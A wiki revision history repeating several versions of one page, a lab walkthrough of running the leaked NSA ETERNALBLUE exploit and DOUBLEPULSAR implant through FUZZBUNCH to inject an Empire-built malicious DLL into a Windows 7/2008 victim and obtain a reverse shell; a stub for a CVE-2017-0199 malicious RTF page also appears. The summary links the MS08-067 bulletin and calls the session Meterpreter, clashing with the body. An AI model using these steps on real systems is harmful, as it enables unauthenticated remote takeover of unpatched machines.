2017-05-02T18:33:07Z

Lphanvan: Created page with "==CVE-2017-0199 Malicious RTF Document== ===Step 1 === Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript) Let's call it "ms.hta" <pre> <..."

NSA - MS17-010

2017-04-30T17:11:02Z

Lphanvan: /* Microsoft Security Bulletin MS17-010 - NSA Tool leak */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==

Author: Ender Loc Phan

Video Proof:

=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

Affected Software:

[[File:Capture17.PNG]]

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''

== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

Vulnerability detail:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

NSA - MS17-010

2017-04-30T17:10:57Z

Lphanvan: /* Microsoft Security Bulletin MS17-010 - NSA Tool leak */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==

Author: Ender Loc Phan
Video Proof:

=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

Affected Software:

[[File:Capture17.PNG]]

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''

== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

Vulnerability detail:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

NSA - MS17-010

2017-04-30T17:10:09Z

Lphanvan: /* Introduction */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

Affected Software:

[[File:Capture17.PNG]]

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''
== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

Vulnerability detail:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

NSA - MS17-010

2017-04-30T17:09:53Z

Lphanvan: /* Introduction */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

Affected Software:

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''
== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

Vulnerability detail:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

NSA - MS17-010

2017-04-30T17:09:29Z

Lphanvan: /* Summary */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''
== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

Vulnerability detail:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

File:Capture17.PNG

2017-04-30T17:09:20Z

Lphanvan:

NSA - MS17-010

2017-04-30T17:07:43Z

Lphanvan: /* Getting Empire session */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''
== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

NSA - MS17-010

2017-04-30T17:07:07Z

Lphanvan: /* Getting Empire session */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==
=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

=== Why Eternalblue & DoublePulsar? ===

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

